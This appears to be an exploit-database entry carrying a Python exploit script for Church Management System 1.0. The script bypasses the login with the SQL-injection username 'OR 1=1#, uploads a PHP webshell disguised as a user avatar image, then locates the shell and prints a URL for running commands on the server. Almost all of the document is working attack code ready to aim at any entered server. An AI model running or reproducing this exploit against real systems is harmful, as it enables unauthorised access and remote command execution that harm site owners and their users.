Exploit for Church Management System 1.0 SQL Injection / Code Execution

Name: Exploit for Church Management System 1.0 SQL Injection / Code Execution
Rating: 5 (157 reviews)
2021-09-21 | CVSS 0.5
## https://sploitus.com/exploit?id=PACKETSTORM:164222
# Exploit Title: Church Management System 1.0 - Authentication Bypass via SQLi + RCE  
# Date: 21.09.2021  
# Exploit Author: Janik Wehrli  
# Vendor Homepage: https://www.sourcecodester.com/php/14949/church-management-system-cms-website-using-php-source-code.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/church_management_1.zip  
# Version: 1.0  
# Tested On: Ubuntu ,Windows 10 + XAMPP 7.4  
# Description: Church Management System (CMS-Website) 1.0 suffers from an Authentication Bypass Vulnerability which gives access to the Admin Account. The Admin Dashboard allows us to upload a PHP webshell by creating a new user with a malicious Avatar Image.  
  
import requests, sys  
from colorama import Fore, Back, Style  
from bs4 import BeautifulSoup  
  
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)  
F = [Fore.RESET, Fore.BLACK, Fore.RED, Fore.GREEN, Fore.YELLOW, Fore.BLUE, Fore.MAGENTA, Fore.CYAN, Fore.WHITE]  
B = [Back.RESET, Back.BLACK, Back.RED, Back.GREEN, Back.YELLOW, Back.BLUE, Back.MAGENTA, Back.CYAN, Back.WHITE]  
S = [Style.RESET_ALL, Style.DIM, Style.NORMAL, Style.BRIGHT]  
info = S[3] + F[5] + '[' + S[0] + S[3] + '-' + S[3] + F[5] + ']' + S[0] + ' '  
err = S[3] + F[2] + '[' + S[0] + S[3] + '!' + S[3] + F[2] + ']' + S[0] + ' '  
ok = S[3] + F[3] + '[' + S[0] + S[3] + '+' + S[3] + F[3] + ']' + S[0] + ' '  
  
  
ASCII_ART = """  
_____ _ _ __ __ _ _____ __ __ _____   
/ ____| | | | | \/ | | | / ____| \/ |/ ____|  
| | | |__ _ _ _ __ ___| |__ | \ / | __ _ _ __ ___ | |_ | | | \ / | (___   
| | | '_ \| | | | '__/ __| '_ \ | |\/| |/ _` | '_ ` _ \| __| | | | |\/| |\___ \   
| |____| | | | |_| | | | (__| | | | | | | | (_| | | | | | | |_ | |____| | | |____) |  
\_____|_| |_|\__,_|_| \___|_| |_| |_| |_|\__, |_| |_| |_|\__| \_____|_| |_|_____/   
__/ |   
V.1.0 https://www.sourcecodester.com/php/14949/church-management-system-cms-website-using-php-source-code.html  
Exploit by Janik Wehrli  
  
"""  
  
# Set variables  
print(ASCII_ART)  
SERVER_URL = str(input("Type in your Church Manangement System URL e.g http://192.168.20.20: \n"))  
LOGIN_URL = SERVER_URL + '/church_management/classes/Login.php?f=login'  
UPLOAD_URL = SERVER_URL + "/church_management/classes/Users.php?f=save"  
PWN_URL = SERVER_URL + "/church_management/uploads/"  
USERNAME = "'OR 1=1#"  
PASSWORD = "PWNED"  
WEBSHELL_NAME = ""  
  
# Uncomment the bottom line to run the exploit through a proxy such as burp  
# proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}  
  
# Create a simple web session with python  
s = requests.Session()  
# GET request to webserver - Start a session & retrieve a session cookie  
get_session = s.get(LOGIN_URL, verify=False)  
# Check connection to website & print session cookie to terminal OR die  
if get_session.status_code == 200:  
print(ok + 'Successfully connected to Bike Rental PHP server & created session.')  
print(info + "Session Cookie: " + get_session.headers['Set-Cookie'])  
else:  
print(err + 'Cannot connect to the server and create a web session.')  
sys.exit(-1)  
  
  
# 1. Bypass Login  
# POST data to bypass Authentication via SQL Injection  
login_data = {'username': USERNAME, 'password': PASSWORD, 'login': ''}  
print(info + "Attempting to Login to Church Management v1.0 the following payload: "+ "username:" + USERNAME + ":" + "password:"+ PASSWORD)  
# auth = s.post(url=LOGIN_URL, data=login_data, verify=False, proxies=proxies)  
auth = s.post(url=LOGIN_URL, data=login_data, verify=False, allow_redirects=True)  
if auth.status_code == 200:  
print(ok, "Success")  
else:  
print(err, "Something Went Wrong")  
  
  
# 2. Upload Webshell  
# Content-Disposition: form-data; name="img"; filename="pwn.php"  
# Content-Type: application/octet-stream  
webshell = {  
'img':  
(  
'pwn.php',  
'6 a $2y$10$Nw16tMpX3SyhtPrhBMD1Ku4jntwsRyQOANFs3.Ikv8eXpoQ0RL9PK\n <?php echo shell_exec($_GET["cmd"]);?> \n',  
'application/octet-stream',  
{'Content-Disposition': 'form-data'}  
)  
}  
fdata = {'firstname': 'test2', 'lastname': 'test2', 'username': 'test2', 'password': 'test2'}  
print(info + "Exploiting Church Management v1.0 file upload vulnerability via User Avatar to upload a PHP webshell")  
# upload_webshell = s.post(url=UPLOAD_URL, files=websh, data=fdata, verify=False, proxies=proxies)  
upload_webshell = s.post(url=UPLOAD_URL, files=webshell, data=fdata, verify=False)  
  
if upload_webshell.status_code == 200:  
print(ok, "Success")  
else:  
print(err, "Something Went Wrong")  
  
uploaded_site = requests.get(PWN_URL)  
soup = BeautifulSoup(uploaded_site.content, 'html.parser')  
for a in soup.find_all('a', href=True):  
b = a['href']  
if "php" in b:  
WEBSHELL_NAME = b  
break  
  
if upload_webshell.status_code == 200:  
print(ok, "Your Webshell is located under: "+ PWN_URL + WEBSHELL_NAME)  
print(ok, "Execute Commands via the GET Parameter 'cmd' for e.g " + PWN_URL + WEBSHELL_NAME+"?cmd=whoami")  
else:  
print(err, "Something went wrong")  
  
dates = soup.findAll("href")